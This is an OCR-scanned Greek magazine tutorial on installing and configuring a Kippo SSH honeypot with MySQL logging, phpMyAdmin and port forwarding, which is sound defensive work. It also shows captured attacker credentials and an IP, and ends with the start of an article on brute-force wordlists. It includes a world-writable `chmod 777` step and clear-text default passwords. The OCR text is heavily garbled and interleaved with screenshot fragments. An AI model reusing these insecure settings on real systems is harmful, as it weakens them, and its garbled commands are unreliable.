να ναι ευκολότερη η ρύθμιση που θα κάνουμε αργότερα στον router, 
αναφορικἁ µετην προώθηση πακέτων απὀ το Internet στο VM. Σε avriOe- 
τη περίπτωση, η &ikovikr| µηχανἠ θα παίρνει IP απὀ τον DHCP server nou 
τρέχει στον router. Γενικά, η διεύθυνση αυτή eivai πιθανὀ να παραμένει 
ίδια, υπάρχει ὁμως πάντα kai η πιθανότητα ν΄ αλλάζει και, ὁπως καταλα- 
βαίνετε, auró μόνο πρακτικὀ δεν εἶναι. Οι ρυθμίσεις της εικονικής κάρτας 
δικτύου γίνονται µε επεξεργασία του αρχείου nou βρἰσκεται στη διαδρομή 
/etc/network/interfaces. Από τη στιγµή που βρισκόμαστε σε περιβάλλον 
κονσόλας, 8a χρησιμοποιήσουμε το γνωστό επεξεργαστή κειµένου vi. Το 
vi εἶναι εὐκολο στη χρήση rou, αλλά θα πρέπει να μάθετε ορισμένες βασι- 
κὲς λειτουργίες. Αν δεν ἐχετε καμία ὀρεξη να το κάνετε ropa (σας KaTa- 
λαβαίνουμε), χρησιμοποιήστε ¿vav απλούστερο text editor, ὁπως εἶναι το 
nano. Ας ανοίξουμε το αρχείο -- αλλά µε δικαιώματα root: 


Local time is now: 
Universal Time is now: 


kippoghoneypot:-$ sudo nano /etc/network/interfaces 


Αρχικά, θα πρέπει ν’ αλλάξετε την επιλογἠ dhcp rou interface σε static. 
Για τη συνέχεια θα πρέπει να 'χετε µια κάποια βασικἠ γνώση yia το τοπικὀ 
σας δίκτυο. Ως παράδειγµα, δείτε ro δικὀ µας αρχείο μετὰ τις αλλαγές: 


# This file describes the fg PuTTY Configuration 


Εικόνα 1 
Κάνοντας σύνδεση 
στη θύρα 22 της 
εικονικής μηχανής 
μπαίνουμε στο 
Kippo honeypot, 
που τρέχει στο 
guest OS. 


y|] x 


network interfaces available 


on your system patat 
g E- Session | Basic options for your PuTTY session 
# and how to activate them. τ Specify the destination you want to connect to 
For more information, see 
4 f Host Name (or IP address) Pot 
interfaces(5). 192.168.177 22 
# The loopback network n type: 
interface © Telnet © Rlogin (9) SS P) Serial 
auto lo EK reg ave or delete a stored session 


- Behaviour 
iface lo inet loopback 


- Translation 


# The primary network 


interface 

auto ethO 

iface ethO inet static 
address 192.168.1.77 


netmask 255.255.255.0 È.. Serial 
network 192.168.1.0 
broadcast 192.168.1.255 


Close window on exit: 
© Aways © Never 


© Only on clean exit 


gateway 192.168.1.1 About ][ me | | 


Open ]| Cae | 
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Ὅπως βλέπετε, δώσαμε στην εικονικἠ µηχανἠ τη στατικἠ διεύθυνση 
192.168.1.77, πράγμα ro οποίο σημειώνουμε για μελλοντικἠ χρήση. Ano- 
θηκεύουµε τις αλλαγὲς κι εγκαταλείπουµε rov editor. (Στο nano, Π.Χ., 
πατάμε ro συνδυασμὸ πλήκτρων [CTRL+0], μετὰ [Enter] κι ακολούθως 
[CTRL-*X].) Πλέον ¿xouv αποθηκευτεἰ επιτυχώς, αλλά δεν ἐχουν εφαρμο- 
στεἰ! Πα να γίνει αυτό πρέπει va επανεκκινήσουµε την υπηρεσία δικτύω- 
σης rou Ubuntu Server, δίνοντας 


kippoghoneypot:-$ sudo /etc/init.d/networking restart 


Με την εντολἠ ifconfig µπορείτε va τσεκάρετε ὁτι ἄλλαξε επιτυχώς η 
διεύθυνση IP στη στατικἠ που δώσατε: Απλά παρατηρήστε το πεδίο inet 
addr της κάρτας ethO και θα πρέπει να δείτε το IP που επιλέξατε npon- 
γουμένως. 


Τελευταίο βήμα εἶναι η aAAayr| της θύρας του SSH server μας. Αυτή τη 
στιγµή, στην εικονικἠὴ μηχανή τρέχει ἑνας OpenSSH server που ακούει 
στη θύρα 22 του συστήματος. Τη συγκεκριμένη όμως θύρα θέλουμε va 
χρησιμοποιήσει ro Kippo nou θα εγκαταστήσουµε αργότερα, οπὀτε για 
να µη χάσουμε τη δυνατότητα απομακρυσμένης σύνδεσης και διαχεἰρι- 
σης rou συστἡματὀὸς µας θα πρέπει να αλλάξουμε τη θύρα του αληθινού 
OpenSSH server σε κἄποια ἄλλη. AUTÒ το κάνουμε τροποποιώντας TO 
αρχείο ρυθμίσεων του OpenSSH daemon, η πλήρης διαδρομή του οποίου 
εἶναι /etc/ssh/sshd config. 


kippoghoneypot:-$ sudo nano /etc/ssh/sshd config 


Στην apyr| rou αρχείου βλέπουμε την παράμετρο Port, την οποία και θα 
αλλάξουμε anó 22 σε κάτι ἆλλο, για παράδειγµα 2222: 

# Package generated configuration file 

it See the sshd config(5) manpage for details 

# What ports, IPs and protocols we listen for 

Port 2222 
Αποθηκεύουμε την αλλαγή, εγκαταλείπουµε τον editor κι επανεκκινούµε 
την υπηρεσία SSH: 


kippoghoneypot:-$ sudo /etc/init.d/ssh restart 


Εγκατάσταση απαραἰτητων πακέτων 


Πα va εγκαταστήσουµε το Kippo θα χρειαστούµε πρὠτα κάποια anapai- 
τητα πακέτα λογισμικού: 


kippoghoneypot:-$ sudo apt-get install python-dev openssl 
python-openssl python-pyasni python-twisted python-mysqldb 


Μπορούμε va κατεβάσουμε την τελευταία stable ἐκδοση rou Kippo (0.5), 
εἶναι ὁμως προτιμότερο va χρησιμοποιήσουμε την nio πρὀσφατη ἐκδοση 
που εἶναι απευθείας διαθέσιμη απὀ SVN (η ἐκδοση αυτή περιἐχει διάφο- 
peç αναβαθμἰσεις και bug-fixes). Πα να πάρουμε κάτι anó SVN θα χρεια- 
στούμε φυσικἀ και το πακέτο subversion: 


kippoghoneypot:-$ sudo apt-get install subversion 


Ένα απὀ ra χαρακτηριστικἁ της ἐκδοσης rou Kippo nou πρὀκειται va Ka- 
τεβάσουμε εἶναι η δυνατότητα καταγραφἠς των επιθέσεων εναντίον του, 
όλων των sessions, των keystrokes του εισβολέα κ.λπ. Όλες αυτές οι 
πληροφορίες συγκεντρώνονται σε µια βάση δεδομένων της MySQL. Αυτό 
εἶναι ἑνα εξαιρετικά θεμιτὀ χαρακτηριστικὀ, καθὼς θα µας επιτρέψει va 


üpaío SSH honeypot, αλλά για το σπιτάκι | 
“0” 


αναλύσουμε ἘἈπολύ3 ευκολότερα ra 


J dl, phpMyAdmin x bm — -----. € — i = 


δεδομένα nou θα συγκεντρώσου- | 
με. Ma να μπορέσουμε να ουμε |€ 
µια πιο εὐκολη πρόσβαση στα στοι- 
χεία της MySQL θα εγκαταστήσου- 
µε και το εργαλείο PHPMyAdmin: 


Q 4 ®© 192.168.1.77/phpmyadmin/ 


| phpMdj/Admin 
kippoghoneypot:-$ sudo apt- | Srexcome to PEVAS 
get install phpmyadmin | [ ms 


English m 


Κατὰ την εγκατάσταση θα ζητηθεί | — 
ο κωδικὸς rou administrative user, 

ο οποίος δεν εἶναι ἄλλος anó τον | 
κωδικὀ που δώσατε κατά την EYKA- | 
τάσταση του λειτουργικού για TOV | 
MySQL server. Στην ερὠτηση σε | 
ποιον web server κάνετε εγκατά- 
σταση της εφαρµογής, επιλέγετε — 


Log in ο 
Username: 


Password: 


EEY 


So 


Apache2. | às cookies must be enabled past this point. 


Επίσης, σχετικἁ µε τη θύρα 22 που θἐλουµε να χρησιμοποιήσουμε, υπάρ- 
χει το πρόβλημα ὁτι στο Linux «μόνοξ o root user επιτρέπεται να χρησι- 
μοποιεὶ θύρες κάτω του 1024 κι εμεἰς για λόγους ασφαλείας δεν πρέπει 
να τρέχουμε το Kippo ως root. Στη σελἰδα του Kippo υπάρχουν διάφορες 
λύσεις για το πῶς µπορεί να τρέξει το honeypot στη θύρα 22, αλλά η nio 
απλἠ εἶναι µε τη βοήθεια της εφαρµογἠς authbind, την οποία και εγκα- 
θιστούμε: 
kippoghoneypot:-$ sudo apt-get install authbind 

H &pappoyr| αυτή κάνει αυτὸ ακριβώς: παρέχει τη δυνατότητα σε va 
πρόγραμμα το onoio εκκινούµε *xopic* δικαιώματα υπερχρήστη (root) 
va επικοινωνεἰ δικτυακά χρησιμοποιώντας θύρες που κατὰ τα ἄλλα θα 
απαιτούσαν δικαιώµατα root. 


Ολοκληρώνουμετις ρυθμίσεις για χρήση της θύρας 22 δίνοντας: 


kippoghoneypot:-$ sudo touch /etc/authbind/byport/22 
kippoghoneypot:-$ sudo chown kippo:kippo /etc/authbind/byport/22 
kippoghoneypot:-$ sudo chmod 777 /etc/authbind/byport/22 


Εγκατάσταση και ρύθμιση του Kippo 


Έχοντας ολοκληρώσει τα παραπάνω βήματα εἱμαστε ἐτοιμοι να εγκατα- 
στήσουμε το ἰδιο το Kippo. Αρχικἁ κατεβάζουμε ὁλα τα αρχεία του στον 
υπολογιστὴ µας anó ro SVN server, μέσω της εντολἠς checkout: 
kippoghoneypot:-$ cd ~ 
kippoghoneypot:-$ svn checkout http://kippo.googlecode.com/svn/ 
trunk/ ./kippo 


A kippo/d1l 

A kippo/utils 

A kippo/utils/passdb.py 
[ινε] 

Α kippo/honeyfs/etc/passwd 
A kippo/honeyfs/etc/issue 
A kippo/fs.pickle 

Checked out revision 214. 


Εικόνα 2 

Anó ro host 
machine rj évav 
υπολογιστή TOU 
δικτύου µας, 
επισκεπτόµαστε 
την εφαρµογή 
PHPMyAdmin που 
τρέχει στον Ubuntu 
Server, στη συγκε- 
κριµένη περίπτωση 
στη διεύθυνση IP 
192.168.1.77. 


phpMyAdmin 


RIONE 


kippo X | 
..] auth 
3 clients 


input 
|] sensors 
E] sessions 


F] ttylog 


(© Create table 


Eikóva 3 

O πίνακας auth 
καταγράφει όλα 
ra credentials που 
δοκιμάζονται για 
πρόσβαση. Εδώ 
παρατηρούμε τις 
προσπάθειες σύν- 
δεσης που μόλις 
πραγματοποιήσα- 
µε. Όπως BA£- 
πουμε η μία ἦταν 
επιτυχἠς, καθώς 
χρησιμοποιήσαμε 
rov default συνδυ- 
ασμὀ root/123456. 
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4 Search X Insert [@ Export Ei Import g Operations 3; Tracking 


LIMITO , 30 


[Profiling [Inline] [ Edit ] [ Explain SQL ] [ Create PHP Code ] [ Refresh ] 


(Show: | 30 | row(s) starting from row 8 | 0 in | horizontal ~ | mode and repeat headers after 


100 cells 


Sort by key: | None - 


* Options 

era 

i^] s? Edit |J! Inline Edit 3: Copy @ Delete 
ὦ’ Edit |J! Inline Edit && Copy @ Delete 
P Edit [2 Inline Edit $ê Copy @ Delete 


id session 
1 808073da5f96116e19915080027a717b3 
2 808073da5f9611e199/5080027a717b3 
3 808073da5f9611e19955080027a717b3 


s username password timestamp 


test 2012-02-25 09:53:10 
honeypot 2012-02-25 09:53:35 
123456 2012-02-25 09:54:28 


0 root 


o 


0 root 


1 


1 root 


t Check All / Uncheck All With selected: « Change 


(Show: | 30 | row(s) starting from row # | 0 


Q Delete = Export 


in | horizontal iz] mode and repeat headers after 


Ta αρχεἰα rou Kippo βρίσκονται πλέον στο φάκελο kippo, µέσα oro home 
directory µας (/home/kippo/kippo). Ας δούµε λἰγο κάποια ενδιαφἐροντα 
αρχεία και φακέλους: 


e dl: Εδώ αποθηκεύονται ra αρχεία nou κάθε εισβολέας µε πρόσβαση 
στο honeypot κατεβάζει, µε χρήση του wget. 

ο log/kippo.log: Αυτό εἶναι ro log file του Kippo, ónou καταγράφο- 
νται όλα τα στοιχεἰα για τη λειτουργία του. 

e log/tty: Σε αυτόν το φάκελο αποθηκεύονται τα session logs, õn- 
Aaórj η καταγραφἠ κάθε συνεδρίας µε ro honeypot. 

ο utils/playlog.py: Αυτό εἶναι ἑνα script που επιτρέπει την avana- 
ραγωγἠ των session logs, σαν να βλέπατε τον εισβολέα σε πραγ- 
µατικὀ χρόνο. 

ο fs.pickle: Το ψεύτικο σύστημα αρχείων του honeypot. 

e honeyfs: Εδὠ εἶναι κἀποια ἐξτρα περιεχόμενα του ψεύτικου OU- 
στήματος αρχείων, τι βλέπει δηλαδἠ ἑνας εισβολέας όταν αποκτήἠ- 
σει πρόσβαση στο honeypot kai προσπελάσει τα συγκεκριµένα ap- 
χεία. 

ο data/userdb.txt: Εδώ βρίσκονται οι συνδυασμοί username και 
password, µε τους οποίους ἑνας επιτιθέμενος µπορεί να αποκτἠ- 
σει πρόσβαση στο honeypot. O default συνδυασμὸς εἰναι root και 
123456. Σε auró το αρχείο µπορείτε να προσθέσετε δικἀ σας OTOI- 
χεία. Όταν κάποιος εισβολέας χρησιμοποιεί την εντολἠ passwd 
μέσα στο honeypot για να αλλάξει κωδικὀ, αυτὸς προστίθεται au- 
τόματα εδώ. 

Επόμενο βήμα η δηµιουργία ενὸς χρήστη και µιας βάσης δεδομένων της 
MySQL, για την αποθήκευση όλων των δεδοµένων που καταγράφει το 
honeypot µας. Κάνουμε σύνδεση στον MySQL server: 


kippoQhoneypot:-$ mysql -u root -p 
Enter password: 
Welcome to the MySQL monitor. 


[sese] 
mysql» 


Commands end with ; or Mg. 


Ώραίο SSH honeypot, αλλά για το σπιτάκι | 
Αα 


Στο τερματικὀ που βλέπουμε μπροστὰ µας, βρισκόμαστε εντὸς της KOV- 
σόλας του MySQL server. Δημιουργούμε τη βάση δεδομένων µε ro ὀνομα 
kippo: 


mysql» CREATE DATABASE kippo; 
Query OK, 1 row affected (0.00 sec) 


Για va µπορέσουµε να γράψουμε KATI σε αυτήν, πρέπει va δηµιουργἠ- 
coupe κι £va χρήστη του MySQL server ο οποίος θα ἐχει τα κατάλληλα 
δικαιώματα πάνω στη συγκεκριμένη βάση. Μπορούμε φυσικἀ να χρησι- 
μοποιήσουμε το χρήστη root της MySQL, αλλά για λόγους ασφαλεἰας και 
συνέπειας ας φτιάξουμε ¿vav νέο χρήστη µε ro ὀνομα (και πάλι) kippo: 


mysql» GRANT ALL ON kippo.* TO 'kippo'glocalhost' IDENTIFIED BY 

'honeypotpassword'; 

Query OK, 0 rows affected (0.00 sec) 
Με την παραπάνω εντολἠ λέμε στον MySQL server: Δώσε στο χρήστη 
kippo, ο οποίος θα αναγνωρίζεται µε Tov κωδικὀ honeypotpassword, όλα 
τα δικαιώματα στους πίνακες της βάσης δεδομένων µε ὀνομα kippo. Mno- 
ρούμε να βγούμε anó την κονσόλα του MySQL server πληκτρολογώντας 
exit. 


Αφού έχουμε λοιπὀν ἑτοιμο το χρήστη και τη βάση µας, πρέπει va κάνου- 
µε va τελικὀ βήμα. Auró εἶναι να φτιάξουμε τη δομή των πινάκων nou 
θα χρειαστεί το honeypot. Πα παράδειγµα, σε κάθε προσπάθεια σύνδεσης 
το Kippo αποθηκεύει Το username που χρησιμοποιήθηκε, τον κωδικό, την 
ώρα και την ημερομηνία κ.λπ. Δεν πρὀκειται βέβαια να κἄτσουµμε μόνοι 
μας να σχεδιάσουμε ποιους πἰνακες και τι πεδία θα χρειαστούμε, καθὼς 
το Kippo ἐχει ἑτοιμα αρχεία τα οποία περιγράφουν το σχήμα της βάσης 
που χρειάζεται. Αυτά τα αρχεία θα τα χρησιμοποιήσουμε yia va ολοκλη- 
ρώσουμε τη διαδικασία. Μετακινούμαστε µέσα στον φάκελο rou Kippo 
που φτιάχτηκε προηγουμένως (όταν ro κατεβάσαμε) και κάνουμε ξανά 
σύνδεση στον MySQL server -- ως χρήστης kippo, αυτή τη φορὰ: 

kippoghoneypot:-$ cd ~/kippo/ 

kippoghoneypot:-/kippo$ mysql -u kippo -p 

Enter password: honeypotpassword 

sea 

mysql> USE kippo; 

Database changed 

mysql> source ./doc/sql/mysql.sql; 

Query OK, 0 rows affected (0.01 sec) 

jo] 

Query OK, 0 rows affected (0.00 sec) 

mysql> exit 

Bye 
Αυτὸ ἦταν. H λειτουργία καταγραφἠς ἐχει ρυθμιστεί. Οι πίνακες οι οποίοι 
δημιουργήθηκαν εἶναι οι παρακάτω: 


ο auth: £60 καταγράφονται ὀλες οι απὀπειρες σύνδεσης στο ψεύτι- 
KO SSH server μας 


e clients: £60 καταγράφονται όλοι οι διαφορετικοί SSH clients nou 
χρησιμοποιούνται yia τη σύνδεση στον ψεύτικο SSH server 
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e input: £00 καταγράφονται ὀλες οι £VTOÀÉG που κἀποιος πληκτρο- 
λογεἰ αφού ἐχει αποκτήσει πρόσβαση στο honeypot 

ο sensors: εδὠ αποθηκεύονται τα honeypots που ἐχουμε στήσει, τα 
οποία χρησιμοποιούν τη συγκεκριμένη βάση yia καταγραφἠ yeyo- 
νότων (μπορούμε να δημιουργήσουμε περισσότερα anó ἑνα Kippo 
honeypots, τα οποία θα καταγράφουν σε µια κεντρικἠ βάση δεδο- 
μένων) 

ο sessions: εδώ καταγράφονται ὁλες οι συνεδρίες που ανοίγουν µε 
τον ψεύτικο SSH server μας 


ο ttylog: εδώ καταγράφονται, σε δυαδική µορφή, ra logs του τερ- 
ματικού rou honeypot 


Εἰμαστε σχεδὀν ἐτοιμοι va ξεκινήσουμε ro Kippo. Μένουν µόνο τρεις TE- 
λευταἰες ρυθμίσεις. Αυτὲς εἶναι: η αλλαγἡ της θύρας στην οποία θα λει- 
τουργεὶ το Kippo (θα βάλουμε την 22), η ενεργοποίηση της καταγραφἠς 
σε βάση δεδοµένων της MySQL και, τέλος, η επεξεργασία του αρχείου 
εκκίνησης rou Kippo, ὡστε να χρησιμοποιεὶ την εφαρµογή authbind που 
εξηγἠήσαµε προηγουμένως κι ἐτσι va µπορεἰ ὀντως να χρησιμοποιήσει τη 
θύρα 22 nou θέλουμε. 


H δύο πρὠτες αλλαγὲς γίνονται στο αρχείο ρυθμίσεων του Kippo το οποίο 
εἶναι το kippo.cfg. 
kippoghoneypot:-/kippo$ cp kippo.cfg.dist kippo.cfg 
kippoghoneypot:-/kippo$ nano kippo.cfg 
Στην ακόλουθη περιοχή του αρχείου, αλλάζουμε τη θύρα nou θα ακούει 
το Kippo anó 2222 σε 22: 
# Port to listen for incoming SSH connections. 
it (default: 2222) 
ssh port - 22 


Επίσης, στις γραμμές 128-132 διαγράφουμε το αριστερὀ # Gore va ενερ- 
γοποιηθούν, ενώ βάζουμε και τον κωδικό του χρήστη kippo του MySQL 
server: 

# MySQL logging module 


# Database structure for this module is supplied in doc/sql/ 
mysql.sql 


# To enable this module, remove the comments below, including 
the 


# [database mysql] line. 
[database mysql] 

host - localhost 

database - kippo 

username - kippo 

password = honeypotpassword 


Αφού αποθηκεύσουµε τις αλλαγὲς και πριν εγκαταλεἰψουµε rov editor, 
καλό εἶναι να ρίξουμε µια ματιὰ και στις υπόλοιπες επιλογές. Μπορούμε 
v’ αλλάξουμε κι ἀλλα πράγματα, ónoc, NX., το hostname του ψεύτικου 
συστήματος. 


Τέλος, κάνουμε την απαραίτητη aAAayr| στο αρχείο εκκἰνησης rou Kippo, 
το οποίο ονομάζεται start.sh: 


üpaío SSH honeypot, αλλά yia το σπιτάκι | 
LLLI 


kippoghoneypot:-/kippo$ nano start.sh 


Την εντολἠ twistd -y kippo.tac -! log/kippo.log --pidfile kippo.pid την aà- 
λάζουμε σε 
authbind --deep twistd -y kippo.tac -1 log/kippo.log --pidfile 
kippo.pid 


Αυτό ἦταν (επιτέλους!) Μπορούμε va ξεκινήσουμε ro Kippo, εκτελώντας 
το αρχείο start.sh (περιττὀ να σημειώσουμε ὁτι θα πρέπει να το EKTE- 
λούμε κάθε φορὰ που ξεκινάμε την εικονικἠ μηχανή, ὥστε να ξεκινά το 
kippo): 

kippoghoneypot:-/kippo$ ./start.sh 

Starting kippo in background...Loading dblog engine: mysql 

Generating RSA keypair... 

done. 


Ελἐγχουµε ὁτι ὀντως ro Kippo λειτουργεἰ σωστά, µε την εντολἠ netstat: 
kippoQhoneypot:-/kippo$ sudo netstat -antp 


Oa πρέπει να δείτε, ανάμεσα στις άλλες, µια γραμμή nou θα μοιάζει p’ 
αυτή: 


tcp 0 θ 0.0.0.0:22 0.0.0.0:*LISTEN — 1118/python 


Port forwarding kai δοκιµἠ καταγραφής 


Για va ελέγξουμε την λειτουργία rou Kippo μπορούμε va κατεβάσουµε 
£vav SSH client στο host machine µας (όπως το Putty στην περίπτωση 
μας, αφού έχουμε Windows 7) και να συνδεθούμµε στο honeypot (βλ. 
εικόνα 1). 


Κατόπιν μπορούμε να δοκιµάσουµε va συνδεθούµε στο σύστημα ως root 
ἡ οτιδήποτε ἀλλο. Θυμηθείτε ὁτι ἑνας συνδυασμὸς που δίνει πρὀσβαση 
στο ψεύτικο σύστημα εἶναι root/123456. Κάντε μερικὲς δοκιμές και karó- 
niv εισέλθετε στο σύστημα για να δεἰτε nog εἶναι. 


Ας δούμε Aoinóv αν ὀντως όλα αυτά καταγράφονται anó το Kippo. Avoi- 
γουµε vav browser anó ro host machine και συνδεόµαστε στην εφαρ- 
μογἠ PHPMyAdmin ως ο χρήστης kippo του MySQL server (βλ. εικὀνα 2). 


Εικόνα 4 

Ο πίνακας input 
καταγράφει oriórj- 
ποτε πληκτρολογεί 
ένας χρήστης μέσα 
στο honeypot. Εδώ 
παρατηρούμε µε- 
pIKÉG εντολές που 
βάλαμε για δοκιμή. 


ΕΠ localhost: B kippo ΒΒ input 
phpMyAdmin Ξ E — 1 
Ej Browse | Ë Structure | [j SQL | 4 Search | Sé Insert | (Xj Export | Eb Import g Operations ® Tracking 
Φπίωώσος 
kippo τ] 
SELECT" 
ise FROM input d 
J clients LIMITO , 30 7 
ΕΙΠΕ F]Prefiling [Inline] [ Edit ] [Explain SQL ] [ Create PHP Code ] [ Refresh ] 
E sensors 
5) sessions "A - - c - 
— ttylog Show:) |30 | rowis) starting from row# [0 | in | horizontal x] mode and repeat headers after | 100 | cells 
— M — E Ξ 
Ὁ Create table. καν | 
+ Options 
ere [4 session i realm success input 


E s? Edit 2’ Inline Edit Ξέ Copy @ Delete 1 808073da5/9611e199/0800277175942012-02-25 09:54:33 NULL iw 
ΕΙ ὁ’ Edit [2 Inline Edit βἑ Copy @ Delete 2 808073da5196116199/08002747175942012-02-25 09:54:36 NULL 1psx 


ΕΙ οὐ Edit [2 Inline Edit 3€ Copy @ Delete 3 808073da59611e1991080027a717b382012-02-25 09:54:54 NULL 0 i know what you did last summer. 


ΕἸ s Edit [2 Inline Edit € Copy @ Delete 4 808073da5f9611e199/5080027a717b982012-02-25 09:54:58 NULL 1 exit 


4... Check All / Uncheck All With selected: ;? Change @ Delete (Œ Export 


Show: [E | row(s) starting from row ἃ [o = | in | horizontal [5]! mode and repeat headers after | 100 


cells 
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Πα va κόνουµε TO 
honeypot προσιτὀ 
στους απαντα- 
XoU hackers Εκεί 
Έξω (TM), πρέπει 
να ορίσουμε τον 
κατάλληλο κανόνα 
port forwarding 
στον router µας. 
Το εικονιζόµενο 
παράδειγµα προ- 
έρχεται απὀ τον 
Linksys router του 
γράφοντα. 
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Αριστερά επιλέγουμε τη βάση kippo, οπότε και βλέπουμε τους πίνακες 
της: αυτούς που εἰχαμε δημιουργήσει προηγουμένως, anó την κονσόλα 
TOU MySQL server. Αν πάμε στον πἰνακα auth θα δούμε τις προσπάθειες 
που μόλις κάναμε για σύνδεση (βλ. εικὀνα 3), £vo στον πίνακα input τις 
εντολὲς που πληκτρολογήσαμε αφού αποκτἠσαµε πρὀσβαση (βλ. εικόνα 
4). Μπορεῖτε va πειραματιστεἰτε και μόνοι σας, evo αν γνωρίζετε SQL 
μπορείτε µε απλὰ ερωτήματα, που δίνουμε στην καρτέλα SQL, va uno- 
λογίσετε διάφορα στατιστικἁ. Πα παράδειγµα, ιδού éva ερώτημα για va 
δείτε τον αριθμό των συνδέσεων ανὰ μοναδικὴ IP: 


select count(ip), ip 

from sessions 

group by ip 

order by count(ip) desc; 
Na κι ἑνα ερώτημα για να δείτε τους 10 πιο συχνά χρησιμοποιούµενους 
κωδικούς: 

select count(password), password 

from auth 

where password <> " 

group by password 

order by count(password) desc 

limit 10; 
Topa, αν δε θέλετε va παιδεύεστε συντάσσοντας ερωτήματα yia την 
MySQL, μπορείτε να βρείτε στο Internet κἄποια εργαλεἰα τα οποία θα 
οπτικοποιήσουν òda αυτά τα δεδομένα για εσάς. To πιο πλήρες εργαλείο 
του εἶδους εἶναι το Kippo-Graph, το οποίο o αρθρογρἀφος ἐχει στην Kap- 
διά του :D Το Kippo-Graph θα δημιουργήσει περίπου 20 γραφήματα µε 
στατιστικἁ και θα εμφανίσει γεωγραφικἁ δεδομένα (geolocation data) 
για τους επιτιθἐµενους χρήστες. Πα την εγκατάσταση και παραδείγματα 
χρήσης rou Kippo-Graph διαβάστε oro site του περιοδικού: 


http://deltahacker.gr/?p-4804 


Port forwarding 


Ὅπως βλέπετε, ro Kippo honeypot εἶναι λειτουργικὀ αλλά μπορεἰ va npo- 
σπελαστεὶ μόνο εντὸς του τοπικού µας δικτύου: προς ro παρὀν, ἑνας Ka- 
κόβουλος χρήστης δεν µπορεί να ro δει απὀ έξω, δηλαδή ano ro Internet. 
Ευτυχώς αυτό αλλάζει εὐκολα, αρκεἰ βεβαίως να κάνουμε port forwarding 
τη θύρα 22 rou ADSL router µας στη θύρα 22 της εικονικὴς μηχανής. 


Single Port Forwarding 
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Application port port Protocol IP Address Enabled 
HTTP a0 80 TP τὶ ma |] 
[ss 22 22 TCP .| 192168177 Ἢ 
FTP-Data 20 20 TCP . 1921681 (Ἢ 


üpaío SSH honeypot, αλλά yia το σπιτάκι | 
ri 


session success username password 
808073da5f9611e199f1b080027a717b9 0 root test 
808073da5f9611e199f1b080027a717b9 0 root honeypot 
808073da5f9611e199f15080027a717b9 1 root 123456 
dr8t/7d45f9b11e199fb080027a717b9 0 root test 
d?8t/7d4519b11e199fb080027a717b9 0 root 213321213 
drat''Td45f9b11e199f1b080027a717b9 0 root exit 
c544cbd05f9f11e199fb080027a717b9 0 root nuebun 
cT81a2be5f9f11e199fb080027a717b9 0 nobody rÜOtb33r 
c9c377b45f9f11e199fb080027a717b9 0 nobody aioLimBa123De 4r3 
ccÜü57cac5f9r11e199fb080027a717b9 0 nobody Al|gibbg5|C314g0Des*chü0t|- (2 
ce474b765f9f11e199f1b080027a717b9 0 sjobeck ^ TelephÜny 
düS8ced3c5f9f11e199f15080027a717b9 0 root J3427368(*(03d 
d2ce5b265f9f11e199fb080027a717b9 0 root ΒΚ321141 


AuTO επιτυγχάνεται μέσα απὀ το web interface του εκάστοτε router -- 
και θα πρέπει va ανατρέξετε στις ρυθμἰσεις του δικού σας. Στην εικόνα 5 
µπορείτε να δείτε ἑνα παράδειγµα port forwarding μέσα anó τον Linksys 
router του αρθρογράφου. Αφού λοιπὀν πραγµατοποιήσουμµε και αυτή την 
τελική (αλήθεια!) ρύθμιση, καθόμαστε αναπαυτικἁ και περιμένουμε... 


Στη δικἡ µας περίπτωση δεν χρειάστηκε να περιμένουμε και πάρα πολύ... 
Εντὸς µιας ώρας δεχτήκαµε την πρώτη µας επίθεση anó ἑναν υπολογι- 
στἠ στη Νότια Κορέα (ra χαιρετίσματα µας), ὁπως µπορείτε να δεἰτε στις 
εικόνες 6 και 7. 


Και κάπου εδώ βάζουμε µια àvo τελεία στο θέμα των honeypots, µε την 
ευχἠ για καλό κυνήγι και την ελπἰδα Ori η εμπειρία που 0' αποκτήσετε 
θα σας δώσει µια ἄλλη οπτικἠ για τις διαδικτυακές επιθέσεις, ενδεχο- 
μένως και για την αλαζονεία διαφόρων ατόμων nou νοιάζονται μόνο να 
καταστρέφουν ξένα συστήματα avri να δημιουργήσουν κἀτι χρήσιμο ἡ 
καινούργιο. 


id endtime 

808073da5f9611e19915080027a717b9 2012-02-25 09:53:00 2012-02-25 09:54:58 
d78f/7d4519b11e19955080027a717b9 2012-02-25 10:31:13 2012-027 
c544c5d05f9111e19955080027a717b9 2012-02-25 10:59:21 2012-02-25 10:59:2 


c781a2be5f9111e199f$b080027a717b9 2012-02-25 10:59:24 2012-02-25 10:59:28 


starttime sensor ip 


1 192.168.1.114 

1 79. GN 
03.252.154. 
1 203.252.154. 


timestamp 
2012-02-25 09:53:10 
2012-02-25 09:53:35 
2012-02-25 09:54:28 
2012-02-25 10:31:24 
2012-02-25 10:31:25 
2012-02-25 10:31:27 
2012-02-25 10:59:23 
2012-02-25 10:59:26 
2012-02-25 10:59:30 
2012-02-25 10:59:34 
2012-02-25 10:59:38 
2012-02-25 10:59:42 
2012-02-25 10:59:45 
Eikóva 6 
Qn, δεν χρειάστηκε 
να περιμένουμε 
πολύ! Μέσα σε µια 
μόλις ώρα κάποιος 
--ἡ κάτι-- άρχισε 
να εξαπολύει eni- 


θεση ενάντια στο 
honeypot! 


termsize client 


80x24 1 

NULL 1 

194 NULL 2 

194 NULL 2 
Εικόνα 7 


Εδώ βλέπουμε την IP rou επιτιθέµενου. Γράφοντας στη μπάρα διευθύνσεων ενὀς web 
browser ro ip-adress.com/whois/203.252.154.194, βλέπουμε ὁτι προέρχεται απὀ 
κάποιον υπολογιστή στη Νότιο Κορέα. 
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Skill: 
Intermediate 
Tags: Wordlist, 
! AGOGO Mm — dictionary, 
152; "V QNS ^ ^ : -— "1 Python, scripting 
» ΠΑΝῚ 


Kj 
Ὁ vio" 
μΠ87..2 ΗΝ να 


Για ra brute force attacks όλοι έχουμε ακούσει. 
Ουσιαστικά, o επιτιθἐµενος επιστρατεύει kardAAQAo 
λογισμικὀ µε το οποίο προσπαθεἰ να μαντέψει τον 
κωδικό πρὀσβασης κάποιου χρήστη, µιας υπηρεσίας ἡ 
ενὸς συστήματος, δοκιµάζοντας vav προς ἑναν τους 
κωδικούς που βρίσκονται αποθηκευμένοι σε µια ἐτοιμη 
λίστα. Προφανώς, το μυστικὸ της επιτυχίας ἐχει να 
κάνει µε TO πόσο καλἠ εἶναι η λίστα µε τους κωδικούς 
ἡ αλλιώς το dictionary ἡ wordlist. 


Meter o οσο 


— ^ ns i AIAN 


Όλες οι στατιστικἐς 
έρευνες και αναλύ- 
σεις συμφωνούν: 
Το πιο δημοφιλές 
password εἶναι Το 
...password, με το 
123456 να ro συ- 
ναγωνίζεται επάξια! 
Πα ἄλλη µια φορά, 
